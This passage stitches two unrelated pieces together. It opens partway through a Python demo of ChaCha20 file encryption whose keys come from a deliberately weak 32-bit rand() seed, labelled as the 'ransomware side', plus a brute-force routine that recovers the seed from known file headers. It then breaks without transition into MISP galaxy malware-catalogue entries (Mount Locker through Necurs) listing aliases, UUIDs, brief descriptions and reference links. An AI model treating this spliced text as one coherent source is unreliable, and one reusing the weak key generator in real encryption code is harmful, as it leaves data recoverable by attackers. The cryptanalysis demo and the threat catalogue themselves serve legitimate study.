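        ks = chacha20_block(key, counter + i // 64, nonce)
        out += bytes(x ^ y for x, y in zip(data[i:i + 64], ks))
    return bytes(out)


def weak_key_from_seed(seed):
    """ASSUMED weak generator: MSVC rand() LCG, 32-bit seed, low byte of each
    output. Only 2**32 possible keys instead of 2**256."""
    key = bytearray()
    s = seed & MASK
    for _ in range(32):
        s = (s * 214013 + 2531011) & MASK
        key.append((s >> 16) & 0xFF)
    return bytes(key)


NONCE = b"\x00" * 12  # constructed; the nonce does not matter for the seed attack


def encrypt_file(plaintext, tick_count):
    """Ransomware side: derive the per-file key from the tick count."""
    return chacha20_xor(weak_key_from_seed(tick_count), NONCE, plaintext)


def recover_seed(ciphertext, known_prefix, seed_lo, seed_hi):
    """Recovery side: brute-force the seed using a known plaintext prefix
    (file magic such as b'%PDF-' or b'PK\\x03\\x04') and an uptime window."""
    n = len(known_prefix)
    for seed in range(seed_lo, seed_hi):
        ks = chacha20_block(weak_key_from_seed(seed), 1, NONCE)[:n]
        if bytes(a ^ b for a, b in zip(ciphertext[:n], ks)) == known_prefix:
            return seed
    return None


def demo():
    """Encrypt a constructed PDF, then recover it from the magic alone."""
    plaintext = b"%PDF-1.7\n" + b"constructed document body " * 4
    tick = 0x0012D687  # assumed GetTickCount value at encryption time
    ct = encrypt_file(plaintext, tick)
    seed = recover_seed(ct, b"%PDF-", tick - 500, tick + 500)
    if seed is None:
        return None, False
    recovered = chacha20_xor(weak_key_from_seed(seed), NONCE, ct)
    return seed, recovered == plaintext
```

The window of 1000 candidate seeds here stands in for the full 2^32; even the full space is a few CPU-hours with a compiled ChaCha20, which is why "RSA-2048 protects the file keys" says nothing about recoverability when the file key itself comes from a 32-bit seed. With a CSPRNG-derived 256-bit key the same attack is infeasible regardless of what is known about the plaintext.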
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mount Locker.
Known Synonyms |
---|
DagonLocker |
MountLocker |
QuantumLocker |
Internal MISP references
UUID b5814e05-532a-4262-a8da-82fd0d7605ee
which can be used as unique global reference for Mount Locker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/ - webarchive
- https://securityscorecard.pathfactory.com/research/quantum-ransomware - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/ - webarchive
- https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/ - webarchive
- https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry - webarchive
- https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates - webarchive
- https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - webarchive
- https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html - webarchive
- https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/ - webarchive
- https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/ - webarchive
- https://community.riskiq.com/article/47766fbd - webarchive
- https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware - webarchive
- https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html - webarchive
- https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ - webarchive
- https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker - webarchive
- https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/ - webarchive
- https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/ - webarchive
- https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/ - webarchive
- https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/ - webarchive
- https://blogs.blackberry.com/en/2021/11/zebra2104 - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Moure
Internal MISP references
UUID bd3468e4-5e00-46e6-a884-6eda1b246394
which can be used as unique global reference for Moure
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
mozart
According to PCrisk, Mozart is malicious software that allows attackers (cyber criminals) to execute various commands on an infected computer through the DNS protocol. This communication method helps cyber criminals avoid detection by security software. Mozart is categorized as a malware loader and executes commands that cause the download and installation of additional malicious software.
Internal MISP references
UUID dde61acb-8c0f-4a3a-8450-96e233f2ddc1
which can be used as unique global reference for mozart
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MPKBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MPKBot.
Known Synonyms |
---|
MPK |
Internal MISP references
UUID 2363dc9f-822a-4581-8d5f-1fc436e70621
which can be used as unique global reference for MPKBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MQsTTang
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MQsTTang.
Known Synonyms |
---|
QMAGENT |
Internal MISP references
UUID aed28126-b8ab-4ab5-a2c6-89898fe689c9
which can be used as unique global reference for MQsTTang
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MRAC
Ransomware.
Internal MISP references
UUID 3eee33df-76c5-4962-ac35-b0d98c37a81a
which can be used as unique global reference for MRAC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MrDec
Ransomware.
Internal MISP references
UUID 1e301d67-cd12-4f46-bcb3-c60f9b78c4d0
which can be used as unique global reference for MrDec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MrPeter
Internal MISP references
UUID 677123aa-3a1a-4443-a968-4f6f4bc6b3c2
which can be used as unique global reference for MrPeter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Msupedge
Internal MISP references
UUID 284136d0-5ece-40f1-bab7-c066604cd80c
which can be used as unique global reference for Msupedge
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MuddyC2Go
Internal MISP references
UUID c22da013-96f4-4dfa-ab24-544da231500e
which can be used as unique global reference for MuddyC2Go
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.muddyc2go - webarchive
- https://www.deepinstinct.com/blog/muddyc2go-latest-c2-framework-used-by-iranian-apt-muddywater-spotted-in-israel - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms - webarchive
- https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MulCom
Internal MISP references
UUID a756ad8a-ac29-49c0-aee8-f3030e7ddeca
which can be used as unique global reference for MulCom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Multigrain POS
Internal MISP references
UUID c513c490-7c76-42ab-a51f-cc780faa7146
which can be used as unique global reference for Multigrain POS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
murkytop
murkytop is a command-line reconnaissance tool. It can be used to execute files as a different user, move and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
Internal MISP references
UUID 2685ea45-06f4-46e0-9397-eff8844db855
which can be used as unique global reference for murkytop
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Murofet
According to bin.re, Murofet, also called LICAT, is a member of the ZeuS family. It uses a Domain Generation Algorithm (DGA) to determine the current C2 domain names.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Murofet.
Known Synonyms |
---|
Licat |
Internal MISP references
UUID f7081626-130a-48d5-83a9-759b3ef198ec
which can be used as unique global reference for Murofet
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://bin.re/blog/three-variants-of-murofets-dga/ - webarchive
- https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://www.wired.com/2017/03/russian-hacker-spy-botnet/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mutabaha
Internal MISP references
UUID 771113e1-8550-4dc2-b2ad-7298ae381cb5
which can be used as unique global reference for Mutabaha
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MyDogs
Internal MISP references
UUID 77d74e8c-664a-42b7-a55d-735ea138a898
which can be used as unique global reference for MyDogs
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html - webarchive
- https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MyDoom
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MyDoom.
Known Synonyms |
---|
Mimail |
Novarg |
Internal MISP references
UUID ac3483f9-522e-4fbc-b072-e5f76972e7b3
which can be used as unique global reference for MyDoom
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom - webarchive
- https://www.malware-traffic-analysis.net/2018/12/19/index.html - webarchive
- https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503 - webarchive
- http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MyKings Spreader
Internal MISP references
UUID ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed
which can be used as unique global reference for MyKings Spreader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader - webarchive
- http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf
- https://decoded.avast.io/janrubin/the-king-is-dead-long-live-mykings/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators - webarchive
- https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf - webarchive
- http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/ - webarchive
- https://blog.talosintelligence.com/2020/07/valak-emerges.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MyloBot
According to PCrisk, MyloBot is a high-risk trojan that allows cyber criminals to control the infected machine. MyloBot can be considered a botnet, since all infected computers are connected to a single network. Depending on the cyber criminals' goals, infected machines might be misused or have additional infections applied.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MyloBot.
Known Synonyms |
---|
FakeDGA |
WillExec |
Internal MISP references
UUID 98d375cb-f940-4bc7-a61e-f47bdcdc48e2
which can be used as unique global reference for MyloBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot - webarchive
- http://www.freebuf.com/column/153424.html - webarchive
- https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/ - webarchive
- https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html - webarchive
- https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet - webarchive
- http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html - webarchive
- https://github.com/360netlab/DGA/issues/36 - webarchive
- https://ti.qianxin.com/blog/articles/Analysis-of-Recent-Activities-of-the-Mylobot-Botnet-EN/ - webarchive
- https://blog.centurylink.com/mylobot-continues-global-infections/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MysterySnail
Internal MISP references
UUID c9b5b0b2-45af-43f2-8eb4-e13493c1342e
which can be used as unique global reference for MysterySnail
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mystic Stealer
According to Zscaler, Mystic Stealer is an information stealer that was first advertised in April 2023. It is capable of stealing credentials from nearly 40 web browsers and more than 70 browser extensions, and it also targets cryptocurrency wallets, Steam, and Telegram. The code is heavily obfuscated, making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants. Mystic implements a custom binary protocol that is encrypted with RC4.
Internal MISP references
UUID 226a9241-e4de-49d0-bb30-4550221f3f9f
which can be used as unique global reference for Mystic Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MZRevenge
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MZRevenge.
Known Synonyms |
---|
MaMo434376 |
Internal MISP references
UUID 5cb1091c-bfe7-440c-a8c7-b652e205e65b
which can be used as unique global reference for MZRevenge
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
N40
Botnet with a focus on banks in Latin America and South America. It relies on DLL sideloading attacks to execute malicious DLL files and uses a legitimate VMware executable in attacks. As of March 2019, the malware is under active development, with updated versions coming out on a persistent basis.
Internal MISP references
UUID 6f0109a5-7cec-4a49-8b27-e18ad5c6cae6
which can be used as unique global reference for N40
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.n40 - webarchive
- http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html - webarchive
- https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/ - webarchive
- https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector - webarchive
- http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nabucur
Internal MISP references
UUID ddf63295-cdba-4c70-a4c6-623ba2b5e6dd
which can be used as unique global reference for Nabucur
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NACHOCHEESE
According to FireEye, NACHOCHEESE is a command-line tunneler that accepts delimited C&C IPs or domains via command-line and gives actors shell access to a victim's system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NACHOCHEESE.
Known Synonyms |
---|
Cyruslish |
TWOPENCE |
VIVACIOUSGIFT |
Internal MISP references
UUID abd22cec-49ee-431f-a2e6-e4722b3e44bb
which can be used as unique global reference for NACHOCHEESE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b - webarchive
- https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html - webarchive
- https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf - webarchive
- https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/ - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nagini
Internal MISP references
UUID 0ec7d065-3418-43ba-a0cc-1e06471893ad
which can be used as unique global reference for Nagini
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Naikon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Naikon.
Known Synonyms |
---|
Sacto |
Internal MISP references
UUID dfb745f1-600a-4d31-a3b0-57bd0a72ac2e
which can be used as unique global reference for Naikon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://securelist.com/analysis/publications/69953/the-naikon-apt/ - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nanocore RAT
Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It has been used for a while by numerous criminal actors as well as by nation-state threat actors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nanocore RAT.
Known Synonyms |
---|
Nancrat |
NanoCore |
Internal MISP references
UUID f9aa9004-8811-4091-a471-38f81dbcadc4
which can be used as unique global reference for Nanocore RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html - webarchive
- https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52 - webarchive
- https://youtu.be/NVnJImFm6P8 - webarchive
- https://medium.com/@shaddy43/secrets-of-commercial-rats-nanocore-dissected-69e1213b34c3 - webarchive
- https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore - webarchive
- https://community.riskiq.com/article/ade260c6 - webarchive
- https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware - webarchive
- https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA - webarchive
- https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages - webarchive
- https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack - webarchive
- https://www.ic3.gov/media/news/2020/200917-1.pdf - webarchive
- https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918 - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html - webarchive
- https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332 - webarchive
- https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html - webarchive
- https://community.riskiq.com/article/24759ad2 - webarchive
- https://www.secureworks.com/research/darktortilla-malware-analysis - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/ - webarchive
- https://blog.morphisec.com/syk-crypter-discord - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html - webarchive
- https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0 - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage - webarchive
- https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/ - webarchive
- https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat - webarchive
- https://goggleheadedhacker.com/blog/post/11 - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread - webarchive
- https://malwareindepth.com/defeating-nanocore-and-cypherit/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter - webarchive
- https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/ - webarchive
- https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://www.embeeresearch.io/advanced-cyberchef-techniques-defeating-nanocore-obfuscation-with-math-and-flow-control/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NanoLocker
Internal MISP references
UUID 00e1373c-fddf-4b06-9770-e980cc0ada6b
which can be used as unique global reference for NanoLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NAPLISTENER
Internal MISP references
UUID c5a291c8-c317-48b4-aad1-d5e9d68c2fc5
which can be used as unique global reference for NAPLISTENER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.naplistener - webarchive
- https://www.elastic.co/security-labs/ref2924-howto-maintain-persistence-as-an-advanced-threat - webarchive
- https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Narilam
Internal MISP references
UUID f5a262c7-59ed-42d1-884d-f8d29acf353f
which can be used as unique global reference for Narilam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nautilus
Internal MISP references
UUID d8295eba-60ef-4900-8091-d694180de565
which can be used as unique global reference for Nautilus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://www.ncsc.gov.uk/alerts/turla-group-malware - webarchive
- https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NavRAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NavRAT.
Known Synonyms |
---|
JinhoSpy |
Internal MISP references
UUID ec0cad2c-0c13-491a-a869-1dc1758c8872
which can be used as unique global reference for NavRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat - webarchive
- https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf - webarchive
- https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/ - webarchive
- https://www.youtube.com/watch?v=rfzmHjZX70s - webarchive
- https://blog.talosintelligence.com/2018/05/navrat.html?m=1 - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
nccTrojan
Internal MISP references
UUID 85056c54-f8f1-4a98-93cb-322cc1deb52c
which can be used as unique global reference for nccTrojan
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan - webarchive
- https://twitter.com/ESETresearch/status/1441139057682104325?s=20 - webarchive
- https://www.youtube.com/watch?v=1WfPlgtfWnQ - webarchive
- https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf - webarchive
- https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/ - webarchive
- https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan - webarchive
- https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9 - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf - webarchive
- https://vblocalhost.com/uploads/VB2020-20.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nebulae
Internal MISP references
UUID 76c75ed0-95ba-4393-8020-4400bdc49de6
which can be used as unique global reference for Nebulae
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nebulae - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf - webarchive
- https://twitter.com/SyscallE/status/1390339497804636166 - webarchive
- https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos - webarchive
- https://www.bleepingcomputer.com/news/security/cyberspies-target-military-organizations-with-new-nebulae-backdoor/ - webarchive
- https://www.securityweek.com/chinese-cyberspies-target-military-organizations-asia-new-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Neconyd
Internal MISP references
UUID fbc29921-6ec4-4cae-b45c-b7d210ffd435
which can be used as unique global reference for Neconyd
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Necurs
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Necurs.
Known Synonyms |
---|
nucurs |
Internal MISP references
UUID 53ad08a6-cca9-401a-a6da-3c0bff2890eb
which can be used as unique global reference for Necurs
